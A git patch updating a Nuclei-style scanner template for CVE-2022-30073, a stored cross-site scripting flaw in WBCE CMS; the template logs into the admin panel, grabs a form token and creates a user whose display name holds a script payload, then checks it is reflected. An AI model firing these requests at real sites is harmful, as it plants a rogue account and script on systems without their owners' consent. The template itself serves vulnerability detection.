From 631a20404687b11b9a106250f1e2535585571de7 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 11 Jul 2022 21:14:02 +0530
Subject: [PATCH] Update CVE-2022-30073.yaml

---
 cves/2022/CVE-2022-30073.yaml | 29 ++++++++++-------------------
 1 file changed, 10 insertions(+), 19 deletions(-)

diff --git a/cves/2022/CVE-2022-30073.yaml b/cves/2022/CVE-2022-30073.yaml
index 0eaaf18b41..254df4b447 100644
--- a/cves/2022/CVE-2022-30073.yaml
+++ b/cves/2022/CVE-2022-30073.yaml
@@ -11,47 +11,38 @@ info:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073
   metadata:
     verified: true
-  tags: wbcecms,xss
+  tags: cve,cve2022,wbcecms,xss,authenticated
 
 requests:
   - raw: 
       - |
-        POST /wbcecms/wbce/admin/login/index.php HTTP/1.1
+        POST /wbce/admin/login/index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
        
-        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh=admin&password_axh5kevh=Admin@123&submit=Login
+        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
 
       - |
-        GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
+        GET /wbce/admin/users/index.php HTTP/1.1
         Host: {{Hostname}}    
         Content-Type: application/x-www-form-urlencoded 
 
       - |
-        POST /wbcecms/wbce/admin/users/index.php HTTP/1.1
+        POST /wbce/admin/users/index.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
 
         formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=temp123&password=tempbitch&password2=tempbitch&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=temp121%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
 
-      - |
-        GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
     cookie-reuse: true
     extractors:
-      - type: regex  # type of extractor
-        name: formtoken # defining the variable name
-        part: body # part of response to look for
-        # group defines the matching group being used. 
-        # In GO the "match" is the full array of all matches and submatches 
-        # match[0] is the full match
-        # match[n] is the submatches. Most often we'd want match[1] as depicted below
+      - type: regex
+        name: formtoken
+        part: body
+        internal: true
         group: 1
         regex:
           - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
-        internal: true
 
 
     matchers-condition: and
@@ -59,7 +50,7 @@ requests:
       - type: word
         part: body
         words:
-          - "<script>alert(document.cookie)</script>"
+          - 'value="<script>alert(document.cookie)</script>" class="wdt250'
 
       - type: word
         part: header